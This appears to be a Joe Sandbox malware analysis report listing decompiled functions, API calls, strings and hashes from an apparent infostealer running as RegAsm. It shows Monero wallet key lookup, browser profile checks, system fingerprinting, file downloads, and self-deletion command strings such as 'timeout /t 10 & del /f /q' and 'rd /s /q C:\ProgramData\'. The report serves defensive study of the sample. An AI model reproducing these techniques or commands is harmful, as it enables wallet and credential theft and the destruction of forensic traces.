Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Strings

" & rd /s /q "C:\ProgramData\, xrefs: 00418333
/c timeout /t 10 & del /f /q ", xrefs: 004182E5
" & exit, xrefs: 004183DA
" & exit, xrefs: 00418389
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 00418390

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memsetlstrcpy$lstrcat$ExecuteExitFileModuleNameProcessShelllstrlen
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2823247455-1079830800
Opcode ID: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction ID: c0b88dd988d93b421ffa70f66641025a2a3514e4fd921881642ee0a142b314ca
Opcode Fuzzy Hash: 8889f6fbfac350e87a9fc1ced9bd81b6a41981885844d669c09df08f1be7d461
Instruction Fuzzy Hash: A951ACB1D4022A9BCB61EF15CD85ADDB3BCAB44708F4110EAA718B3151DA746FC68E58

Function 004109A2 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 110memorystringCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71
wsprintfA.USER32 ref: 00410AA7
lstrcatA.KERNEL32(00000000,00436E3C), ref: 00410AB6

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

lstrlenA.KERNEL32(?), ref: 00410ACD

Part of subcall function 004123D5: malloc.MSVCRT ref: 004123DA
Part of subcall function 004123D5: strncpy.MSVCRT ref: 004123EB

lstrcatA.KERNEL32(00000000,00000000), ref: 00410AF0

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Strings

wA, xrefs: 00410B21
QuBi, xrefs: 00410A27
:\, xrefs: 00410A06
C, xrefs: 004109DF

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$AllocCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
String ID: wA$:\$C$QuBi
API String ID: 1856320939-1441494722
Opcode ID: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction ID: d36f890e74e7e8ef669b83a96deb31b174d36e7948efbde015f1e97a0a99ead9
Opcode Fuzzy Hash: 67b1be9e31ade1d1e820cd34b34a28b7063542f71b3e79275d8882d479f03449
Instruction Fuzzy Hash: B941AFB1A042289BCB249F749D85ADEBAB9EF19308F0000EAF109E3121E6758FD58F54

Function 00411203 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 155registrystringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
wsprintfA.USER32 ref: 004112DD
RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

Strings

- , xrefs: 004113E6
%s\%s, xrefs: 004112D7
?, xrefs: 00411263

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
String ID: - $%s\%s$?
API String ID: 1736561257-3278919252
Opcode ID: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction ID: a1c3be3d6f3fdb40de360404d346c16f4973fffda027df273c7b2494bd9b7707
Opcode Fuzzy Hash: 617242c50c5e9a7485eda1de3311a44ff0c10fdc2246e554a89d168bc2664c5f
Instruction Fuzzy Hash: A861F6B590022C9BEF21DB15DD84EDAB7B9AB44708F1042E6A608A2121DF35AFC9CF54

Function 004067ED Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 110networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00406836
StrCmpCA.SHLWAPI(?), ref: 00406856
InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 00406877
CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406892
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004068C8
InternetReadFile.WININET(00000000,?,00000400,?), ref: 004068F8
CloseHandle.KERNEL32(?), ref: 00406923
InternetCloseHandle.WININET(00000000), ref: 0040692A
InternetCloseHandle.WININET(?), ref: 00406936

Strings

<+A, xrefs: 00406954

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID: <+A
API String ID: 2507841554-2778417545
Opcode ID: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
Instruction ID: 1d44a0941bf69239cbc718c5fc054d573873141a30687fa59e6c761baef87c5b
Opcode Fuzzy Hash: 856b629bf82c4ff1a83c675378c3e7c10b8657cdf3afe6ec6eeb97d6b7c5d7bf
Instruction Fuzzy Hash: 22411CB1900128ABDF20DB21DD49BDA7BB9EB04315F1040B6BB09B21A1D6359E958FA9

Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
lstrlenA.KERNEL32(?), ref: 00416925

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,?), ref: 0041693A
lstrlenA.KERNEL32(?), ref: 00416949
lstrlenA.KERNEL32(00000000), ref: 00416962

Strings

ERROR, xrefs: 0041697E
ERROR, xrefs: 00416977
ERROR, xrefs: 00416985
ERROR, xrefs: 0041696D
ERROR, xrefs: 00416914

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
Opcode Fuzzy Hash: cba5ef62937bcd0ece7cfbe729aa70542ea14c206f344e1eed86aa985cb31328
Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99

Function 0040EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(0094C481), ref: 0040EAF9
StrCmpCA.SHLWAPI(0094C481), ref: 0040EB56
StrCmpCA.SHLWAPI(0094C481,firefox), ref: 0040EE1D
StrCmpCA.SHLWAPI(0094C481), ref: 0040EC33

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

StrCmpCA.SHLWAPI(0094C481), ref: 0040ECE3
StrCmpCA.SHLWAPI(0094C481), ref: 0040ED40

Strings

Stable\, xrefs: 0040ED5B
firefox, xrefs: 0040EE17
Stable\, xrefs: 0040EB71

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: Stable\$ Stable\$firefox
API String ID: 3722407311-2697854757
Opcode ID: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction ID: 5ee9920858f87ab95f25d72870b6309d75f224e844084726c2f6447a77145a42
Opcode Fuzzy Hash: f47b23f97fdeb4fe9174fc30896a49faa6594533cdb81bf1bfd78cb08f979325
Instruction Fuzzy Hash: 5FB19E72D00109AFDF20FFA9D947B8D7772AF40318F550126F904B7291DB78AA688BD9

Function 00415DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00415E86

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 00415EA3
lstrcatA.KERNEL32(?,?), ref: 00415EC2
lstrcatA.KERNEL32(?,?), ref: 00415ED6
lstrcatA.KERNEL32(?), ref: 00415EE9
lstrcatA.KERNEL32(?,?), ref: 00415EFD
lstrcatA.KERNEL32(?), ref: 00415F10

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411D92: GetFileAttributesA.KERNEL32(?,?,?,0040DA7F,?,?,?), ref: 00411D99

Part of subcall function 00415B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00415B30
Part of subcall function 00415B0B: HeapAlloc.KERNEL32(00000000), ref: 00415B37
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415B50
Part of subcall function 00415B0B: FindFirstFileA.KERNEL32(?,?), ref: 00415B67
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A98), ref: 00415B88
Part of subcall function 00415B0B: StrCmpCA.SHLWAPI(?,00436A9C), ref: 00415BA2
Part of subcall function 00415B0B: wsprintfA.USER32 ref: 00415BC9

Strings

LzA, xrefs: 00415FC2

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeapwsprintf$AllocAttributesFindFirstFolderPathProcesslstrcpy
String ID: LzA
API String ID: 1968765330-1388989900
Opcode ID: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction ID: 3907ee1014e8156982b731ec0efd03be7befdbbf2a83afad572f10a5b305f32e
Opcode Fuzzy Hash: 61a9eae631c4f4c070e409ad03bdd47fbe0ad62b514eba050441441a9a86a129
Instruction Fuzzy Hash: AC51FBB1A0011C9BCF54DB64DC85ADDB7B9BB4C315F4044EAF609E3250EA35AB89CF58

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction ID: eb1f70013287725bf786605e83da5f1b289e944c87060308bf9427b65ac1957a
Opcode Fuzzy Hash: bf469ea079a5c9aa9189a4ad8b5c63bf1766affe1fde04721859988ce0042922
Instruction Fuzzy Hash: 045191B1D0022C9FDB309F54DC85BDDB7B9AB44308F0001FAA609B7692D6796E89CF59

Function 00407FAC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
LocalFree.KERNEL32(0040ECBC,?,?,?,?,0040E756,?,?,?), ref: 0040802B
CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034

Strings

V@, xrefs: 00408042

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: V@
API String ID: 2311089104-383300688
Opcode ID: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction ID: 10e4ee5bcd24e5c00d10c93a2cb3902743b6293cd5753d2e79081f11b23a5eb1
Opcode Fuzzy Hash: d63a5464314b69c61ac75c0db440d02a9ca78bdcd81ff691c89ea163c61aca46
Instruction Fuzzy Hash: 47116070900204EFDF25DF64DD88EAF7BB9EB48741F20056AF481F2290EB769A85DB11

Function 00401AB8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 129stringCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00401ADC

Part of subcall function 00401A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00401A65
Part of subcall function 00401A51: HeapAlloc.KERNEL32(00000000), ref: 00401A6C
Part of subcall function 00401A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00401AE9), ref: 00401A89
Part of subcall function 00401A51: RegQueryValueExA.ADVAPI32(00401AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 00401AA4

lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00401AF1
lstrlenA.KERNEL32(?), ref: 00401AFE
lstrcatA.KERNEL32(?,.keys), ref: 00401B19

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
